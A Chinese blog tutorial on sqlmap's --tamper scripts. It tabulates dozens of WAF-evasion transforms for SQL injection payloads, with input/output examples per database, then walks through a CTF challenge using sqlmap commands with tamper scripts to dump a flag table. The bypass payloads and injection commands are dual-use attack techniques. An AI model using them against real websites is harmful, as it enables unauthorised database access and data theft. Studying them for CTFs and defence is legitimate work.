暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

sqlmap tamper参数

鸡术有限 2019-04-07
1293

首先纠正一个错误,昨天的

--tamper=TAMPER

用给定脚本修改注入数据(主要用来检测和绕过安全狗

说绕过检测和绕过安全狗也没什么错,但是这不是tamper的全部功能,他的全部功能是用来检测和绕过waf的,有兴趣的同学可以调试下他源代码。(如果你的开发环境是python3环境要调一下呀)

这一篇耽搁了两三天是因为,在跑sqlmap的时候出了点问题,问题在篇末,本篇未解决。



目录

0x01 tamper简述

0x02 tamper简单使用

0x01 简述

现在waf(web应用防护墙)已经成为标准安全解决方案之一了,网站基本上都架设了waf,皮一下,被墙记录了。


横冲直撞怕是进去不去了,sqlmap给我们 提供了一个选项--tamper,有这个工具辅助带我螺旋走位,我中路法师怕是要起飞。

下面是我从网上找的脚本总结。看一下有印象就行。

支持的数据库

脚本名称

作用

实现方式

all

apostrophemask.py

用utf8代替引号

("1 AND '1'='1") 

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' 

base64encode.py 

用base64编码替换

("1' AND SLEEP(5)#")

'MScgQU5EIFNMRUVQKDUpIw=='

multiplespaces.py

围绕SQL关键字添加多个空格

('1 UNION SELECT foobar')

'1    UNION     SELECT   foobar'

space2plus.py

用+替换空格

('SELECT id FROM users')

'SELECT+id+FROM+users'

nonrecursivereplacement.py

双重查询语句。取代predefined SQL关键字with表示 

suitable for替代(如  .replace(“SELECT”、”")) filters

('1 UNION SELECT 2--')

'1 UNIOUNIONN SELESELECTCT 2--'

space2randomblank.py

代替空格字符(“”)从一个随机的空

白字符可选字符的有效集

('SELECT id FROM users')

'SELECT%0Did%0DFROM%0Ausers'

unionalltounion.py

替换UNION ALL SELECT UNION SELECT

('-1 UNION ALL SELECT')

'-1 UNION SELECT'

securesphere.py

追加特制的字符串

('1 AND 1=1')

"1 AND 1=1 and '0having'='0having'"

mssql

space2hash.py

绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

'1 AND 9227=9227' 

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' 

equaltolike.py

like 代替等号

* Input: SELECT * FROM users WHERE id=1 

2 * Output: SELECT * FROM users WHERE id LIKE 1 

space2mssqlblank.py(mssql)

空格替换为其它空符号

Input: SELECT id FROM users

Output: SELECT%08id%02FROM%0Fusers

space2mssqlhash.py

替换空格

('1 AND 9227=9227')

'1%23%0AAND%23%0A9227=9227'

between.py

用between替换大于号(>)

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

percentage.py

asp允许每个字符前面添加一个%号

* Input: SELECT FIELD FROM TABLE

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

sp_password.py

追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

('1 AND 9227=9227-- ')

'1 AND 9227=9227-- sp_password'

charencode.py

url编码

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

randomcase.py

随机大小写

* Input: INSERT

* Output: InsERt

charunicodeencode.py

字符串 unicode 编码

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

space2comment.py

Replaces space character (‘ ‘) with comments ‘/**/’

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

mysql >= 5.1.13

equaltolike.py

like 代替等号

* Input: SELECT * FROM users WHERE id=1 

2 * Output: SELECT * FROM users WHERE id LIKE 1 

greatest.py

绕过过滤’>’ ,用GREATEST替换大于号。

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

apostrophenullencode.py

绕过过滤双引号,替换字符和双引号。

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

ifnull2ifisnull.py

绕过对 IFNULL 过滤。

替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

('IFNULL(1, 2)')

'IF(ISNULL(1),2,1)'

space2mssqlhash.py

替换空格

('1 AND 9227=9227')

'1%23%0AAND%23%0A9227=9227'

modsecurityversioned.py

过滤空格,包含完整的查询版本注释

('1 AND 2>1--')

'1 /*!30874AND 2>1*/--'

space2mysqlblank.py

空格替换其它空白符号(mysql)

Input: SELECT id FROM users

Output: SELECT%0Bid%0BFROM%A0users

between.py

用between替换大于号(>)

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

modsecurityzeroversioned.py

包含了完整的查询与零版本注释

('1 AND 2>1--')

'1 /*!00000AND 2>1*/--'

space2mysqldash.py

替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

('1 AND 9227=9227')

'1--%0AAND--%0A9227=9227'

bluecoat.py

代替空格字符后与一个有效的随机空白字符的SQL语句。

然后替换=为like

('SELECT id FROM users where id = 1')

'SELECT%09id FROM users where id LIKE 1'

percentage.py

asp允许每个字符前面添加一个%号

* Input: SELECT FIELD FROM TABLE

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

charencode.py

url编码

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

randomcase.py

随机大小写

* Input: INSERT

* Output: InsERt

versionedkeywords.py

Encloses each non-function keyword with versioned MySQL comment

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

space2comment.py

Replaces space character (‘ ‘) with comments ‘/**/’

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

charunicodeencode.py

字符串 unicode 编码

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

versionedmorekeywords.py

注释绕过

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

MySQL < 5.1

halfversionedmorekeywords.py

关键字前加注释

* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa

* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

halfversionedmorekeywords.py

当数据库为mysql时绕过防火墙,每个关键字之前添加

mysql版本评论

1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")

2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

MySQL >= 5.1.13

space2morehash.py

空格替换为 #号 以及更多随机字符串 换行符

* Input: 1 AND 9227=9227

* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

 Oracle

greatest.py

绕过过滤’>’ ,用GREATEST替换大于号。

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

apostrophenullencode.py

绕过过滤双引号,替换字符和双引号。

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

between.py

用between替换大于号(>)

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

charencode.py

url编码

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

randomcase.py

随机大小写

* Input: INSERT

* Output: InsERt

charunicodeencode.py

字符串 unicode 编码

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

space2comment.py

Replaces space character (‘ ‘) with comments ‘/**/’

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

 PostgreSQL

greatest.py

绕过过滤’>’ ,用GREATEST替换大于号。

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

apostrophenullencode.py

绕过过滤双引号,替换字符和双引号。

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

between.py

用between替换大于号(>)

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

percentage.py

asp允许每个字符前面添加一个%号

* Input: SELECT FIELD FROM TABLE

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

charencode.py

url编码

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

randomcase.py

随机大小写

* Input: INSERT

* Output: InsERt

charunicodeencode.py

字符串 unicode 编码

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

space2comment.py

Replaces space character (‘ ‘) with comments ‘/**/’

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

Access

appendnullbyte.py

在有效负荷结束位置加载零字节字符编码

('1 AND 1=1')

'1 AND 1=1%00'

其他

chardoubleencode.py

双url编码(不处理以编码的)

* Input: SELECT FIELD FROM%20TABLE

* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

unmagicquotes.py

宽字符绕过 GPC  addslashes

* Input: 1′ AND 1=1

* Output: 1%bf%27 AND 1=1–%20

randomcomments.py

用/**/分割sql关键字

‘INSERT’ becomes ‘IN//S//ERT’

0x02 tamper简单使用

ctf地址:http://www.shiyanbar.com/ctf/1875

题目如图:



sqlmap跑起来

python sqlmap/sqlmap.py -u "http://ctf5.shiyanbar.com/423/web/?id=1" --batch

跑了5分钟就这点东西


这也太慢了

还是先用bp跑一下看看过滤了什么吧。。。


加载字典,我的字典里就那几个字符和一些基本的语句,没找到大佬的字典。


可以看到过滤了空格和一般的查询语句

5

space2mssqlhash.py

替换空格

('1 AND 9227=9227')

'1%23%0AAND%23%0A9227=9227'

加上这个脚本试试

python.exe sqlmap/sqlmap.py -u"http://ctf5.shiyanbar.com/423/web/?id=1" --tamper space2mssqlhash.py --batch --dbs --level=5

爆表名

python.exe sqlmap/sqlmap.py -u"http://ctf5.shiyanbar.com/423/web/?id=1" --tamper space2mssqlhash.py,nonrecursivereplacement.py --batch -D web1 --tables --level=5 --thread 10


爆不出表名,那个flag表是我猜的表名,用正常的思路怕是跑不出来表名了。但是比赛的话,很少会直接用flag来当表名吧,但是也是一个思路。

python.exe sqlmap/sqlmap.py -u"http://ctf5.shiyanbar.com/423/web/?id=1" --tamper space2mssqlhash.py nonrecursivereplacement.py --batch --columns -D web1 -T flag -C flag --dump --level=5 --thread 10


最后爆出了flag,但是感觉有点像瞎猫碰上死耗子。。。你有没有什么其他的思路呢,如果有请留言讨论。

求关注



文章转载自鸡术有限,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论